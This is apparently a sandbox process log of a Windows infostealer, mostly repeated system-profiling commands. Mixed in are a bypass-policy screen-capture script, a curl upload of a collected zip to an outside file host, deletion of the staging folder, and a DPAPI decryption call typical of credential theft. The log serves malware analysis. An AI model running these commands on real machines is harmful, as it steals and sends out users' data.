powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";"
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat
C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\extract.js
C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3.js
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5kpjkbri\5kpjkbri.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83F6.tmp" "c:\Users\Admin\AppData\Local\Temp\5kpjkbri\CSCE400AA8EC443E2A29B455AFBC1AEB.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120)